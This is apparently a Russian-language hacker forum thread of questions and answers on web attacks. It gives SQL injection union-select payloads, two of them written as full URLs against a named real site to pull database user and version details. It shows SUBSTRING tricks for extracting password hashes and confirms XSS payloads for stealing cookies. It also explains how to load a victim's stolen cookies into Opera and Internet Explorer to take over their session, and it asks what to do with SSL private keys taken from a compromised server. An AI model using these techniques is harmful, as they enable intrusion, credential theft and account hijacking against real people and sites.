Ваши вопросы по уязвимостям.

сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

 

мы тут про вывод

 

Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>

то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???

 

Да.Такие-же действия.

 

Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Version()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User(),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает

 

Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.

 

а ты в phpmyadminе залогинен?

 

Привет всем Ребят подскажите вот что:
Есть купи с другого компа, как их использовать?

 

В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...

 

а куда их вставлять? в строку броузера?

 

не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies

 

Неет!
В опере:
Инструменты->настройки->дополнительно->cookie->управление cookie

 

понятно а в эксплолере?

 

%USERPROFILE%\Cookies

 

а где это в эксплолере искать? по подробней если можно

 

посмотрел ссылку почитал сделал как показанно но произошла ошибка((( не импортируется ни чего

 

искать не надо ничего - открой проводник, вбей в адресную строку %USERPROFILE%\Cookies и туда скопируй файлы куков своих

 

Версия 7
попугай нашел куда вставлять куки , а как пароли от сайтов узнать пробовал заходить на сайт с установленной кукой другого компа и ни чего не произошло.. Подскажите ?

 

ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?

 

Пипл,нашёл папку на машине:

/usr/local/apache/etc/ssl.all

Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.crt,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?